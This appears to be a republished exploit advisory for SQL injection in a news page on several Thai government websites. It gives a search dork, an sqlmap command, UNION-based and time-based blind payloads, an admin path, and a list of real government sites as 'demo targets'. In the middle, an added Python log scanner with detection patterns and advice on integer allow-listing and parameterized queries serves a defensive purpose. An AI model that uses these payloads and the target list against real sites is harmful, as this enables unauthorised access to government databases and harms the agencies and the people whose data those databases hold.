Thailand Government SQL Injection Vulnerability, Tested on Kali Linux 2018.1


Exploit Information

[+] Exploit Title: Thailand Government SQL Injection Vulnerability
[+] Author : Cxsecurity.com and SaruH4N & Turkhackteam.org
[+] Dork : inurl:select_news.php?news_id=
[+] Tested on : Kali Linux 2018.1, Chrome

Poc

[+] SQLMAP Poc : sqlmap -u "http://www.muangphai.go.th/select_news.php?news_id=148" --dbs
[+] Poc SQL Injection : Payload: news_id=91' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178767171,0x737058556a724a7847784a786d724f4d71617448515a44456444516d526177676349527446507356,0x716b7a7671),NULL,NULL,NULL-- lIGH
[+] Poc local Admin : /admin.php

GET Parameter

Parameter: news_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: news_id=67' AND SLEEP(5) AND 'TwPA'='TwPA
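
A defender-side check for the requests described above, as an added example that is not part of the original advisory: it scans web-server access logs for non-integer news_id values and labels the UNION-based and time-based blind patterns shown here. The log lines, IP addresses and the function names classify and scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Mar/2018:10:00:01 +0700] "GET /select_news.php?news_id=148 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2018:10:02:13 +0700] "GET /select_news.php?news_id=67%27%20AND%20SLEEP%285%29%20AND%20%27TwPA%27%3D%27TwPA HTTP/1.1" 200 5120 "-" "sqlmap/1.2 (constructed)"
198.51.100.7 - - [01/Mar/2018:10:02:20 +0700] "GET /select_news.php?news_id=91%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20x HTTP/1.1" 200 812 "-" "sqlmap/1.2 (constructed)"
192.0.2.44 - - [01/Mar/2018:10:05:00 +0700] "GET /index.php?page=2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client IP, request target, status code, user agent
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# (label, pattern) pairs matched against the URL-decoded parameter value
RULES = [
    ("union-based", re.compile(r"\bunion\b.+\bselect\b", re.I)),
    ("time-based blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("quote/comment break-out", re.compile(r"['\"]|--|#|/\*")),
]

def classify(value):
    """Return labels for a news_id value; an empty list means a plain integer."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return []
    labels = [name for name, rx in RULES if rx.search(value)]
    return labels or ["non-integer value"]

def scan(log_text, param="news_id"):
    """Return one finding per request whose `param` value is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, _status, agent = m.groups()
        # parse_qs percent-decodes the value before the rules are applied
        for value in parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, []):
            labels = classify(value)
            if labels:
                # The user agent is client-controlled, so treat it as a hint only.
                findings.append({"ip": ip, "value": value, "labels": labels,
                                 "sqlmap_ua": "sqlmap" in agent.lower()})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["labels"], repr(f["value"]), "sqlmap UA" if f["sqlmap_ua"] else "")
```

Because legitimate news_id values are integers, the same allow-list (digits only) belongs in the application itself, together with a parameterized query, so the value never reaches the SQL text.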




Demo Target

- http://www.namtok.go.th/select_news.php?news_id=91
- http://www.bangtathen.go.th/select_news.php?news_id=67
- http://www.muangphai.go.th/select_news.php?news_id=148

Source: [Cxsecurity.com]